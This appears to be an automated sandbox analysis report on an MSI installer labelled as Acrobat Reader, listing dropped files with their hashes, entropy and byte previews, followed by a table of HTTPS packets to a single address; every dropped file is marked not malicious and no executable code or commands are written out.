                                                                  SSDEEP:12288:FurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgy:UihNREtRdYndJP32R7vKG+47/L025zEe
                                                                  MD5:6EA44A4959FF6754793EABF80EB134D6
                                                                  SHA1:FAC049850CA944EC17CDA0C20DFBC3A30F348611
                                                                  SHA-256:7A23E492658E6D38873F3AD82F41EC1FA45102DA59FA8D87595D85DAFCA6FA98
                                                                  SHA-512:E620835985A8EF03A55AF210D156F9DFA6313D4C36131EA17FDAD9B6ACAB37214041535EFE99B7A33355CE8D5FF88E0C1ED10719726F4A23B51650CF7B15AE13
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L....=.d.........."!...$.r..................................................0............@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.169314820760015
                                                                  Encrypted:false
                                                                  SSDEEP:12:JSbX72FjTGiAGiLIlHVRpU5h/7777777777777777777777777vDHFFo4fJl0i8Q:JxJQI5Gn9oF
                                                                  MD5:0E857B4B0ECFFD3F42B88A9957CBF616
                                                                  SHA1:D7D6BCE22A68B81584B17835A748F5073642FB93
                                                                  SHA-256:613D0C9D1C8A912939D2B7BA044FE1DF43C279F06DA7638F5F6CF03CC711D020
                                                                  SHA-512:4ACF9344145D809A07576FF200BFE3184899D5FC2221F7F619414BF17CF3D5960DC83EC433B40D1CA914A6459B8F745F0B5CA7D34AA1A7365CAEB3B311F8DE55
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5518183023436243
                                                                  Encrypted:false
                                                                  SSDEEP:48:T8Ph8uRc06WXJmFT5RGAV1LLGvSCLLGRAECiCyjeoxLLGvSCLLGlTu:6h819FT3VhgLJECmgL
                                                                  MD5:02E7471F0F3761E1CC3D434EAE36D85D
                                                                  SHA1:EDE98A4FCAD6C7D04D9E7C8DCE055198D8726307
                                                                  SHA-256:862E974D9A6346A9B89AF933A37B2C29212B0F6A8CF701478E6D2D9663DA64CB
                                                                  SHA-512:CAABC9C5C773BFED66E3D3211853DE7E2D888CB3C8DFFD476D75FDD0ED5CDDB6859E54BDA6C6144050C6649E54B27A31A97A41ED56F56266BBDE63ECBC7CCEED
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):432221
                                                                  Entropy (8bit):5.375166719723329
                                                                  Encrypted:false
                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauv:zTtbmkExhMJCIpErS
                                                                  MD5:9D931D8D391CF45A54D9CABEC68C5C54
                                                                  SHA1:86BA1055EFED1AC3881D905FCCE9F0EA8B0D12E1
                                                                  SHA-256:5A3269F9EEDEB71BB1F60A47667C00A4D2C9ADB9F1BB4AADFB5458F326AC0CAB
                                                                  SHA-512:09AC2A053265468B2E85E36ABC0382A059D568A47EE5C4FFBAFA1FD72E7AEE9C25D6453DB21D1749B3803CADEEADBD4564459F4CC1C8AD4F1F1ABCC4F8B38FDD
                                                                  Malicious:false
                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):73728
                                                                  Entropy (8bit):0.1334395306830368
                                                                  Encrypted:false
                                                                  SSDEEP:48:rxTeLLGvSCLLGOLLGvSCLLGRAECiCyjeoDxD/:KgLhgLJECux
                                                                  MD5:CB73A5E653620CBE0FC3A7B1026E6A2D
                                                                  SHA1:87971AA04E050DFF3BE296EDAEA708F93F53D2BF
                                                                  SHA-256:4DE00FE1F07E58FD6AEF0444724AC396B6348D9AAFA1A936D38BB573966E9CF7
                                                                  SHA-512:59B93A60E02E4370BDE501C1C4B9A09200DCCE8C4DA4F1654CB401638F63EA5EB995223F4530A83314ABDBFE880535DF2F3C05C8FCBF5B8E6FD637C31171D2E3
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2452573410953152
                                                                  Encrypted:false
                                                                  SSDEEP:48:FL0ukWO+CFXJnT5JGAV1LLGvSCLLGRAECiCyjeoxLLGvSCLLGlTu:V0DPTPVhgLJECmgL
                                                                  MD5:FE591D858D33AF80F070F9FC7E386D6B
                                                                  SHA1:33FF3E055DC37F82F10BB10381579BCF4BB138A2
                                                                  SHA-256:5C53372D4F6E4EE09567F7AA5E595623D76B75A122C82E455960FCF682CA41CB
                                                                  SHA-512:BE0BCB0088609621E266A65D330E97A50B66F721BFB792CB4B32920C85515F386FFC06CD2594B1F272A5E4D933FD4501661850E49DDEA522D1F5595CE2F04A00
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):0.07523111032424484
                                                                  Encrypted:false
                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOsImQondRER6Vky6lD1:2F0i8n0itFzDHFFo4fJ
                                                                  MD5:1EB1CC87B402F407D747FB6DC5A8F082
                                                                  SHA1:2023FD01DD3C72F9823E91C44A2563670A909A09
                                                                  SHA-256:83C3CB9669ACA79BE6296476622451FAEC741120C0F4E250A761155C8402F527
                                                                  SHA-512:F1E99A6556C5617E3563B38438795A1A269EBB3DDB5802EDF5A56B1F11CFF20D59448B43BB2F79C8378ED172932FE85E0362F43A357B0EE1627882A9AC9FAC62
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5518183023436243
                                                                  Encrypted:false
                                                                  SSDEEP:48:T8Ph8uRc06WXJmFT5RGAV1LLGvSCLLGRAECiCyjeoxLLGvSCLLGlTu:6h819FT3VhgLJECmgL
                                                                  MD5:02E7471F0F3761E1CC3D434EAE36D85D
                                                                  SHA1:EDE98A4FCAD6C7D04D9E7C8DCE055198D8726307
                                                                  SHA-256:862E974D9A6346A9B89AF933A37B2C29212B0F6A8CF701478E6D2D9663DA64CB
                                                                  SHA-512:CAABC9C5C773BFED66E3D3211853DE7E2D888CB3C8DFFD476D75FDD0ED5CDDB6859E54BDA6C6144050C6649E54B27A31A97A41ED56F56266BBDE63ECBC7CCEED
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2452573410953152
                                                                  Encrypted:false
                                                                  SSDEEP:48:FL0ukWO+CFXJnT5JGAV1LLGvSCLLGRAECiCyjeoxLLGvSCLLGlTu:V0DPTPVhgLJECmgL
                                                                  MD5:FE591D858D33AF80F070F9FC7E386D6B
                                                                  SHA1:33FF3E055DC37F82F10BB10381579BCF4BB138A2
                                                                  SHA-256:5C53372D4F6E4EE09567F7AA5E595623D76B75A122C82E455960FCF682CA41CB
                                                                  SHA-512:BE0BCB0088609621E266A65D330E97A50B66F721BFB792CB4B32920C85515F386FFC06CD2594B1F272A5E4D933FD4501661850E49DDEA522D1F5595CE2F04A00
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2452573410953152
                                                                  Encrypted:false
                                                                  SSDEEP:48:FL0ukWO+CFXJnT5JGAV1LLGvSCLLGRAECiCyjeoxLLGvSCLLGlTu:V0DPTPVhgLJECmgL
                                                                  MD5:FE591D858D33AF80F070F9FC7E386D6B
                                                                  SHA1:33FF3E055DC37F82F10BB10381579BCF4BB138A2
                                                                  SHA-256:5C53372D4F6E4EE09567F7AA5E595623D76B75A122C82E455960FCF682CA41CB
                                                                  SHA-512:BE0BCB0088609621E266A65D330E97A50B66F721BFB792CB4B32920C85515F386FFC06CD2594B1F272A5E4D933FD4501661850E49DDEA522D1F5595CE2F04A00
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):1.5518183023436243
                                                                  Encrypted:false
                                                                  SSDEEP:48:T8Ph8uRc06WXJmFT5RGAV1LLGvSCLLGRAECiCyjeoxLLGvSCLLGlTu:6h819FT3VhgLJECmgL
                                                                  MD5:02E7471F0F3761E1CC3D434EAE36D85D
                                                                  SHA1:EDE98A4FCAD6C7D04D9E7C8DCE055198D8726307
                                                                  SHA-256:862E974D9A6346A9B89AF933A37B2C29212B0F6A8CF701478E6D2D9663DA64CB
                                                                  SHA-512:CAABC9C5C773BFED66E3D3211853DE7E2D888CB3C8DFFD476D75FDD0ED5CDDB6859E54BDA6C6144050C6649E54B27A31A97A41ED56F56266BBDE63ECBC7CCEED
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.466057480552637
                                                                  Encrypted:false
                                                                  SSDEEP:6144:gIXfpi67eLPU9skLmb0b49WSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbO:lXD949WlLZMM6YFHU+O
                                                                  MD5:A5873FCA4EEA1879E3F0F5C9E51648E0
                                                                  SHA1:FB56F07E60A0071D7F9A4731C8066D790350D9C6
                                                                  SHA-256:93EBBE3C67311757C72BBBEEEBEA7406332F459973EC774650F045EDB7FB12E1
                                                                  SHA-512:8370BF506479525F037CB3BB6A8D61E15F740AFD675194CC23DDA8D96EF6B14B468C00D33A74EB363D29C4284EF763F8DC3B86C75025F537A523D1B37BD52944
                                                                  Malicious:false
                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Z.5...............................................................................................................................................................................................................................................................................................................................................q.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {5B6FA660-828A-4D54-BAE1-600B3F823A73}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jul 9 22:09:24 2024, Number of Pages: 200
                                                                  Entropy (8bit):7.831579432330587
                                                                  TrID:
                                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                  File name:2024.0198840 298135.msi
                                                                  File size:7'456'256 bytes
                                                                  MD5:f316aec665bed01d909032716dc813d4
                                                                  SHA1:225efa49e02093d3110b5d36d9fc259135fae33a
                                                                  SHA256:b018842cb1708e4a80d0dfb8bf81ecf0e638aa652989e160e6bd8903e25f9e0c
                                                                  SHA512:372a2c24dfc73fc3c799da607eb5c0e7219aa25efaf9c8e185dcdbeb80609b028cf5ff515512483b016c943cfbe9f277cc8fc3ce2e1a836dcca3dc4e54e8c576
                                                                  SSDEEP:98304:S+X+n/8/ZyU1AH4K3YuNr8ZFO2wB5qEp9ctHLcyew4r+eODtAIIMQY5dinV6pmMe:6/iyuAY8NrAOjLp2JcLniztAIL53A
                                                                  TLSH:F6761222B687C137D56D0173E868FE5E1679BE730B3145E7B7E8396E88B08C15379A02
                                                                  File Content Preview:........................>...................r...................................F.......b.......t.......................................s...............................................~......................................................................
                                                                  Icon Hash:2d2e3797b32b2b99
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 11, 2024 03:56:02.277443886 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.277503014 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.277967930 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.289376974 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.289396048 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.871350050 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.871449947 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.874634027 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.874672890 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.875093937 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.892116070 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.932512045 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.998581886 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.998778105 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.998866081 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.998934984 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.998953104 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.998982906 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.999034882 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:02.999074936 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:02.999139071 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.005532980 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.005754948 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.005819082 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.005851030 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.005968094 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.006021023 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.006036043 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.012868881 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.013487101 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.013499975 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.056894064 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.089348078 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089483976 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089566946 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089651108 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089685917 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.089710951 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089737892 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.089806080 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089885950 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.089942932 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.089957952 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.090460062 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.090522051 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.090536118 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.090604067 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.090732098 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.090888023 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.093893051 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.093961954 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.093967915 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.093988895 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.094018936 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.094160080 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.094228983 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.094297886 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.094311953 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.094876051 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.094888926 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.094988108 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.095046043 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.095058918 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.095550060 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.095632076 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.095644951 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.096184015 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.098005056 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.098018885 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.150806904 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.150883913 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178051949 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178149939 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.178154945 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178215981 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178280115 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.178299904 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178385973 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178446054 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.178458929 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178550005 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.178610086 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.178622007 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179497004 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179518938 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179542065 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179559946 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.179583073 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179606915 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179609060 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.179609060 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.179629087 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179634094 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.179665089 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.179673910 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.179692030 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.179713964 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.182852983 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.182904959 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.182945013 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.182957888 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.182987928 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.183008909 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.183861017 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.183912039 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.183938026 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.183949947 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.183978081 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.183996916 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:03.266712904 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.266757965 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:03.266791105 CEST49730443192.168.2.4151.101.129.138
